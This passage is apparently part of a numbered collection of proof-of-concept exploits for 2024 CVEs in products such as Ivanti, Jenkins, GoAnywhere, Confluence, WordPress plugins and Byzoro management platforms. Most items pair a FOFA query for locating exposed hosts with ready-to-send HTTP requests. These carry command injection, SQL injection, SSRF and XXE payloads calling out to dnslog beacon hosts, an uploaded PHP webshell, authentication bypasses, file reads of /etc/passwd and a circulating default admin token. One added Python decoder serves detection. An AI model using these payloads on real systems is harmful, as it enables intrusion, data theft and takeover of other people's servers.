Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

(The source had "¶meter", an HTML-entity mangling of "&parameter"; the parameter name is parameter.) The server wraps the script field in a JavaScript function body and evaluates it with the JDK script engine, so the leading %7D (}) closes that body, the Java.type(...) call runs at save time, and the trailing %3B%7B (;{) keeps the wrapper syntactically valid.


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA: app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

URL-decoded, the body is {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}: the facade dispatches to the SysManager ping service and the param value is passed to a shell, so everything after the pipe runs as a command.


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA: icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

The JSON response contains the stored path of the uploaded .php file; the extension is not checked.

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA: body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The /api/v1/totp/user-backup-code/../../ prefix is the authentication bypass that public exploitation chained with this bug: it reaches the license/keys-status/ endpoint without a session, and the %3b (;) in the last path segment breaks out into a shell command. A DNS query to the beacon host confirms execution.


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA: body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The SAML component fetches the ds:RetrievalMethod URI while processing the signature, so an outbound request to the URI host proves the SSRF (the doubled "<<", "cc14n" and "22000" in the source were copy garbling and have been repaired). The signature value itself is never validated before the fetch.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA: body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML; the external parameter entity is resolved while the SAML message is parsed, so a DNS/HTTP hit on the entity host confirms the XXE:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA: title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

The empty token is accepted, so the system status configuration is returned without authentication. (The headers in the source had lost their spacing and the Accept-Language value was garbled; they are normalized here, and the body is the 41-byte compact JSON the Content-Length refers to.)

105. SpringBlade v3.2.0 export-user SQL injection
FOFA: body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
(The URL is truncated in the source. As in the two requests below, the injection is through the query-string parameter name, which SpringBlade's dynamic query condition passes into the SQL; the updatexml error reveals the md5 value.)

106. SpringBlade dict-biz/list SQL injection
FOFA: body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

These SpringBlade injections are authenticated. The Blade-Auth value above is an HS512 JWT for the built-in admin user (user_name admin, tenant 000000) that circulates in public PoCs; it is only accepted by deployments that still use the default signing secret. Where the secret has been changed, a token from a real login is needed.

107. SpringBlade tenant/list SQL injection
FOFA: body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA: "dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

The web-upload endpoint fetches the url parameter server-side to load it as a CSV; a DNS hit on the beacon confirms the SSRF.

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA: header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

(The body is shown as a Python bytes literal; send the raw bytes. It carries the CLI arguments "help" and "@/etc/passwd", then the encoding, locale and start frames.)

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Both requests carry the same Session id and must be open at the same time; the download side returns the command output. The args4j parser expands an argument beginning with "@" to the contents of that file on the controller, so the first lines of /etc/passwd come back inside the error message:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

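A decoder for the framed request body above, added here as an example and not part of the original post. The framing is read off the bytes on the page: a 4-byte big-endian chunk length, a 1-byte opcode, then the chunk, where the string chunks carry a 2-byte length prefix (Java writeUTF). The opcode names are this example's assumption. The point for defenders is the last function: an ARG chunk beginning with "@" is exactly what args4j expands as a file, so a capture of /cli?remoting=false upload bodies can be screened for it.

```python
# Added example (not part of the original post): decode the PlainCLI-style
# frames of the Jenkins CLI PoC body and flag "@file" arguments.
import struct

# Assumed opcode names, in the order the PoC bytes use them (0..3).
OPCODES = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START"}

# Constructed copy of the upload body shown in the PoC above.
POC_BODY = (b"\x00\x00\x00\x06\x00\x00\x04help"
            b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
            b"\x00\x00\x00\x05\x02\x00\x03GBK"
            b"\x00\x00\x00\x07\x01\x00\x05en_US"
            b"\x00\x00\x00\x00\x03")


def parse_frames(body):
    """Split a framed CLI body into (opcode_name, text) tuples.

    Each frame: uint32 length (of the chunk only), uint8 opcode, chunk.
    Non-empty chunks are writeUTF strings: uint16 length + UTF-8 bytes.
    Truncated input raises ValueError instead of silently stopping.
    """
    frames, off = [], 0
    while off < len(body):
        if off + 5 > len(body):
            raise ValueError("truncated frame header at offset %d" % off)
        length, op = struct.unpack_from(">IB", body, off)
        off += 5
        chunk = body[off:off + length]
        if len(chunk) != length:
            raise ValueError("truncated frame body at offset %d" % off)
        off += length
        text = ""
        if length:
            (ulen,) = struct.unpack_from(">H", chunk, 0)
            text = chunk[2:2 + ulen].decode("utf-8")
        frames.append((OPCODES.get(op, "OP%d" % op), text))
    return frames


def file_expansion_args(body):
    """Return ARG values that start with '@', the args4j file-expansion trigger."""
    return [text for name, text in parse_frames(body)
            if name == "ARG" and text.startswith("@")]


if __name__ == "__main__":
    for name, text in parse_frames(POC_BODY):
        print("%-9s %r" % (name, text))
    print("suspicious args:", file_expansion_args(POC_BODY))
```

Jenkins 2.442 and LTS 2.426.3 stopped expanding "@" arguments, so on a patched controller the request above only yields a "help" usage error; on an unpatched one the frame with "@/etc/passwd" is the indicator to alert on.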
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA: body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The ..;/ segment is a path-normalization bypass of the filter that blocks the initial-setup wizard after installation. If the response is the account-setup form rather than a redirect, the host is vulnerable and the form can be submitted to create a new administrator.


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA: "wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Time-based: a response delayed by about 6 seconds confirms the unauthenticated injection in the id parameter of the REST route.

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA: body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

The type value is concatenated into the UPDATE statement's column name; a 5-second delay confirms it.

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA: "/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The link parameter is fetched without scheme or destination checks, so file:// reads local files and http:// turns it into an SSRF.


114. WordPress MasterStudy LMS plugin SQL injection
FOFA: body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Time-based injection in the user parameter of the order/items REST route; a 5-second delay confirms it.

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce. It is embedded in the HTML of any front-end page (look for the nonce field in the Bricks JavaScript settings in the response):
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command. The render_element REST endpoint accepts the nonce as its only check and passes queryEditor to eval(); throwing the output as an exception returns it in the response:
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket plugin file upload
FOFA: body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

The request is taken from a scanner template ({{rand8}} is its placeholder for a random 8-character name) and the file part is empty in the source; it was reformatted here with the blank lines multipart requires. Because the endpoint is under /wp-admin/, it needs an authenticated session with access to the plugin's configuration page; the flaw is that the image upload does not check the extension.


117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA: body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

The id parameter is taken as an array and its where key is spliced into the query; admin-ajax.php serves the action to unauthenticated visitors, so no login is needed. A 5-second delay confirms it.

118. Beijing Byzoro (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA: title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field controls where the upload is written, so the webshell lands at the caller-chosen path. Then request /home/src.php with the command in the passwd POST parameter.

119. Beijing Byzoro (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA: title="Smart管理平台"
Log in first (the default credentials are admin/admin); the injection is authenticated, in the id parameter of the manageadmin add action:
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

Time-based: the request is delayed by 5 seconds when the database name is 3 characters long. (The Origin and Referer in the source pointed at a public IP address; they are replaced with the same placeholder as the Host header.)


120. Beijing Byzoro (百绰) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA: title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

The file is written to /upload/2.php (the source lacked the closing "--" on the final boundary; it is added here so the multipart body is well-formed).

121. Beijing Byzoro (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA: title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

The file is written to boot/web/upload/weblogo/1.php (the id_type value was lost in the source and is left empty; the closing "--" on the final boundary is added so the body is well-formed).

122. Byzoro (北京百绰智能) Smart S200 management platform importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user is created, log in to the admin backend directly; system commands can be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
